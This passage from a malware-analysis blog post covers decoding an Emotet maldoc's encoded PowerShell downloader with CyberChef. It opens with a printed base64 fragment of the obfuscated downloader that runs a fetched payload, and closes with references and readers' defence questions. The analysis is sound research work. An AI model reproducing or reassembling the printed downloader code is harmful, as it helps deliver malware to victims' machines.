EwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA

So this is much better, and we are almost there. This is pretty much the same output we would have gotten taking the quicker route with automated tools or grabbing the encoded command from a previous detonation in a sandbox. Here we see an encoded PowerShell process being loaded by a WMI service. The only thing left to do is decode the base64 encoded chunk and derive the final PowerShell script. Luckily, the maldocs from the new Emotet campaigns are not nearly as complicated as they have been in the past with multiple layers of obfuscation and varying techniques with compression, arrays, character substitutions, and DOSFuscation etc,. In this case we really just need to decode the base64, an easy job for one of my favorite tools, CyberChef:

I wish they were all this easy…

Dropping the block of Base64 into CyberChef, we just need to decode and then remove the Null bytes. The initial output will appear to have many periods, but they are actually null bytes, and if you try to do a string replace on the periods, you will get nowhere. I typically like to do some formatting for the URLs by marking some split delimiters and using regex to isolate the URLs. Remember, with Emotet, there are always five, which many researchers commonly refer to as the “quintet.” For what it’s worth, here is my recipe for this obfuscation style:

 From_Base64('A-Za-z0-9+/=',true)
 Remove_null_bytes()
 Split('@','\n')
 Split('=\'','\n')
 Split('\'.','\n')
 Regular_expression('User defined','^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)\.[a-z]{2,5}(:[0-9]{1,5})?(\/.)?$',true,true,false,false,false,false,'List matches')

So that’s it, my (somewhat) quick look at one of Emotet’s new maldoc downloaders. It’s always fun to dig into one of these and solve the puzzle the hard way. Obviously, this isn’t the most appropriate method when just grabbing indicators, and I have written a few posts covering those best practices here and here. This was a fun exercise, and I hope you found some value or learned something new as well. Thank you for reading Security Soup, and please let me know if you have any feedback on ways to improve this blog or anything that I may have missed.

References

https://www.us-cert.gov/ncas/alerts/TA18-201A
https://twitter.com/MalwareTechBlog/status/1164616966499254272
https://twitter.com/Cryptolaemus1/status/1173519452190781442
https://blog.talosintelligence.com/2019/09/emotet-is-back-after-summer-break.html
https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/
https://www.bleepingcomputer.com/news/security/emotet-trojan-evolves-since-being-reawakend-here-is-what-we-know/
https://threatpost.com/emotet-summer-vacation-stolen-email-tactic/148460/
https://twitter.com/pollo290987/status/1174181052023267328
https://twitter.com/SethKingHi/status/1174992704398168065
https://pcsxcetrasupport3.wordpress.com/2019/09/20/a-deeper-look-inside-one-of-the-new-emotet-malware-docs/
https://security-soup.net/a-quick-look-at-emotets-updated-javascript-dropper/
https://github.com/decalage2/oletools
https://github.com/decalage2/ViperMonkey
https://gchq.github.io/CyberChef/
https://security-soup.net/extractnetworkindicators-part1/

5 comments / Add your comment below

  1. Thank you, I am an IT Sys Admin, we don’t have much budget to defend ourself so we were attacked by this TrojanDownloader. I found the article very useful and interesting (I am also learning Cyber Security on my own) and I wanted to ask a question. Do you think that disabling the VBA plugin in outlook and block .rar , .zip and .doc extensions helps to slow down the spreading?
    Thank you

    1. Hi thanks for the comment. Those solutions may stop the spread, however there could be some unknown business impact to blocking those extensions. I would recommend disabling macros or only allowing signed macros if your org must use them. Hope this helps!

      1. Hi, I’ve disabled VBA add-in but the mail are still present. Right now I have installed Eset Internet Security on every computer. How do they manage to still receive the emails? What do you suggest me? I have checked for new folders under roaming and local profile, new scheduled task but I can’t find anything…
        Can you help me?
        Thanks, best regards

  2. This is a great article. But I’m stuck, when opening VB editor, there are only two modules (Normal and Project($file_name’)) in project view, I can’t see other user forms or class modules. Is these hidden, or I don’t have the right options in VB editor?

Leave a Reply

Your email address will not be published. Required fields are marked *